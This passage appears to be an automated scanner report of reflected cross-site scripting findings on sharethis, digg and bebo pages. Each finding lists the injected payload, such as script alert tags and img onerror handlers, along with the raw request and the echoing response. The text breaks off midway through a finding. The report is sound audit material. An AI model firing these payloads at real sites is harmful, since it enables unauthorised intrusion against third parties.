Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://seg.sharethis.com/socialOptimization.ps.js [campaign parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /socialOptimization.ps.js

Issue detail

The value of the campaign request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7fe87'%3balert(1)//a1486ba0d2b was submitted in the campaign parameter. This input was echoed as 7fe87';alert(1)//a1486ba0d2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /socialOptimization.ps.js?campaign=RT-microsoft_ie97fe87'%3balert(1)//a1486ba0d2b HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Wed, 06 Jul 2011 15:39:05 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Content-Length: 1424

(function(){

var __stPublisher='';var __stCampaign='RT-microsoft_ie97fe87';alert(1)//a1486ba0d2b';
function createRetargetSegmentFrame(){
   var segmentFrame=null;
   try {
       segmentframe = document.createElement('<iframe name="strtframe" allowTransparency="true" style="body{background:transparent;}"
...[SNIP]...

2.2. http://widgets.digg.com/buttons/count [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload c4f69<script>alert(1)</script>20e43ada28b was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///D%3A/acunetix_reports/reports/addthiscom/dom-based-xss-reflected-cross-site-scripting-example-poc.htmlc4f69<script>alert(1)</script>20e43ada28b HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: traffic_control=f04100000060110000168986608%3A219%3A112; d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2

Response

HTTP/1.1 200 OK
Age: 0
Date: Wed, 06 Jul 2011 11:55:24 GMT
Via: NS-CACHE: 100
Etag: "2a89518f414c8e7d929f49e94144265e8d188287"
Content-Length: 193
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Wed, 06 Jul 2011 12:05:23 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///D:/acunetix_reports/reports/addthiscom/dom-based-xss-reflected-cross-site-scripting-example-poc.htmlc4f69<script>alert(1)</script>20e43ada28b", "diggs": 0});

2.3. http://www.bebo.com/Profile.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /Profile.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76260'%3b31937eadaad was submitted in the REST URL parameter 1. This input was echoed as 76260';31937eadaad in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Profile.jsp76260'%3b31937eadaad HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14161
Date: Wed, 06 Jul 2011 14:07:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
m.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/profile76260';31937eadaad/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...

2.4. http://www.bebo.com/Profile.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /Profile.jsp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f7fa9'><script>alert(1)</script>05692309f65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Profile.jspf7fa9'><script>alert(1)</script>05692309f65 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14386
Date: Wed, 06 Jul 2011 14:07:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/profilef7fa9'><script>alert(1)</script>05692309f65&QueryString=&Lang=nl'>
...[SNIP]...

2.5. http://www.bebo.com/Profile.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /Profile.jsp

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1ae31<script>alert(1)</script>f9c6fa1b86e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Profile.jsp1ae31<script>alert(1)</script>f9c6fa1b86e HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14368
Date: Wed, 06 Jul 2011 14:07:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/profile1ae31<script>alert(1)</script>f9c6fa1b86e page, please try again.</div>
...[SNIP]...

2.6. http://www.bebo.com/Profile.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /Profile.jsp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b9d2"><img%20src%3da%20onerror%3dalert(1)>04e16ce8f26 was submitted in the REST URL parameter 1. This input was echoed as 1b9d2"><img src=a onerror=alert(1)>04e16ce8f26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /Profile.jsp1b9d2"><img%20src%3da%20onerror%3dalert(1)>04e16ce8f26 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14413
Date: Wed, 06 Jul 2011 14:07:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-profile1b9d2"><img src=a onerror=alert(1)>04e16ce8f26" >
...[SNIP]...

2.7. http://www.bebo.com/c/games [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/games

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bb8ef'><script>alert(1)</script>06c303df1ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/gamesbb8ef'><script>alert(1)</script>06c303df1ce HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14368
Date: Wed, 06 Jul 2011 14:07:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/gamesbb8ef'><script>alert(1)</script>06c303df1ce&QueryString=&Lang=nl'>
...[SNIP]...

2.8. http://www.bebo.com/c/games [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/games

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56d4e'%3b1fde5453e13 was submitted in the REST URL parameter 2. This input was echoed as 56d4e';1fde5453e13 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/games56d4e'%3b1fde5453e13 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14157
Date: Wed, 06 Jul 2011 14:07:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
lem.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/games56d4e';1fde5453e13/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...

2.9. http://www.bebo.com/c/games [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/games

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c709f<script>alert(1)</script>864df3dcbf3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/gamesc709f<script>alert(1)</script>864df3dcbf3 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14350
Date: Wed, 06 Jul 2011 14:07:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/gamesc709f<script>alert(1)</script>864df3dcbf3 page, please try again.</div>
...[SNIP]...

2.10. http://www.bebo.com/c/games [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/games

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ba66"><img%20src%3da%20onerror%3dalert(1)>6a4e8145e3f was submitted in the REST URL parameter 2. This input was echoed as 6ba66"><img src=a onerror=alert(1)>6a4e8145e3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/games6ba66"><img%20src%3da%20onerror%3dalert(1)>6a4e8145e3f HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14451
Date: Wed, 06 Jul 2011 14:07:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-games6ba66"><img src=a onerror=alert(1)>6a4e8145e3f" >
...[SNIP]...

2.11. http://www.bebo.com/c/games/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/games/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c6532'><script>alert(1)</script>5330bf814b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/gamesc6532'><script>alert(1)</script>5330bf814b/ HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14361
Date: Wed, 06 Jul 2011 14:07:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/gamesc6532'><script>alert(1)</script>5330bf814b&QueryString=&Lang=nl'>
...[SNIP]...

2.12. http://www.bebo.com/c/games/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/games/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46c6a"><img%20src%3da%20onerror%3dalert(1)>723b17830da was submitted in the REST URL parameter 2. This input was echoed as 46c6a"><img src=a onerror=alert(1)>723b17830da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/games46c6a"><img%20src%3da%20onerror%3dalert(1)>723b17830da/ HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14453
Date: Wed, 06 Jul 2011 14:07:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-games46c6a"><img src=a onerror=alert(1)>723b17830da" >
...[SNIP]...

2.13. http://www.bebo.com/c/games/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/games/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8c3e4<script>alert(1)</script>f3051a94c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/games8c3e4<script>alert(1)</script>f3051a94c5/ HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14343
Date: Wed, 06 Jul 2011 14:07:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/games8c3e4<script>alert(1)</script>f3051a94c5/ page, please try again.</div>
...[SNIP]...

2.14. http://www.bebo.com/c/games/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/games/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2aa6c'%3b95d3aefc4c6 was submitted in the REST URL parameter 2. This input was echoed as 2aa6c';95d3aefc4c6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/games2aa6c'%3b95d3aefc4c6/ HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14159
Date: Wed, 06 Jul 2011 14:07:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
lem.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/games2aa6c';95d3aefc4c6//'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTra
...[SNIP]...

2.15. http://www.bebo.com/c/invite/join [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/invite/join

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cc5ae<script>alert(1)</script>5db11e3ec76 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/invitecc5ae<script>alert(1)</script>5db11e3ec76/join HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14404
Date: Wed, 06 Jul 2011 14:07:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/invitecc5ae<script>alert(1)</script>5db11e3ec76/join page, please try again.</div>
...[SNIP]...

2.16. http://www.bebo.com/c/invite/join [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/invite/join

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80dd5'%3bccc67b1d634 was submitted in the REST URL parameter 2. This input was echoed as 80dd5';ccc67b1d634 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/invite80dd5'%3bccc67b1d634/join HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14211
Date: Wed, 06 Jul 2011 14:07:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
em.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/invite80dd5';ccc67b1d634/join/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pag
...[SNIP]...

2.17. http://www.bebo.com/c/invite/join [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/invite/join

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8281a'><script>alert(1)</script>a91f426563e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/invite8281a'><script>alert(1)</script>a91f426563e/join HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14422
Date: Wed, 06 Jul 2011 14:07:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/invite8281a'><script>alert(1)</script>a91f426563e/join&QueryString=&Lang=nl'>
...[SNIP]...

2.18. http://www.bebo.com/c/invite/join [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/invite/join

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c65e2"><img%20src%3da%20onerror%3dalert(1)>783c94f6204 was submitted in the REST URL parameter 2. This input was echoed as c65e2"><img src=a onerror=alert(1)>783c94f6204 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/invitec65e2"><img%20src%3da%20onerror%3dalert(1)>783c94f6204/join HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14505
Date: Wed, 06 Jul 2011 14:07:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-invitec65e2"><img src=a onerror=alert(1)>783c94f6204-join" >
...[SNIP]...

2.19. http://www.bebo.com/c/invite/join [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/invite/join

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d8253<img%20src%3da%20onerror%3dalert(1)>5d0e25f3a03 was submitted in the REST URL parameter 3. This input was echoed as d8253<img src=a onerror=alert(1)>5d0e25f3a03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/invite/joind8253<img%20src%3da%20onerror%3dalert(1)>5d0e25f3a03 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14213
Date: Wed, 06 Jul 2011 14:07:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div id="content" class="content-wrap">Could not find action: joind8253<img src=a onerror=alert(1)>5d0e25f3a03.</div>
...[SNIP]...

2.20. http://www.bebo.com/c/invite/join [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/invite/join

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7c09'><script>alert(1)</script>33e80344b01 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/invite/joina7c09'><script>alert(1)</script>33e80344b01 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
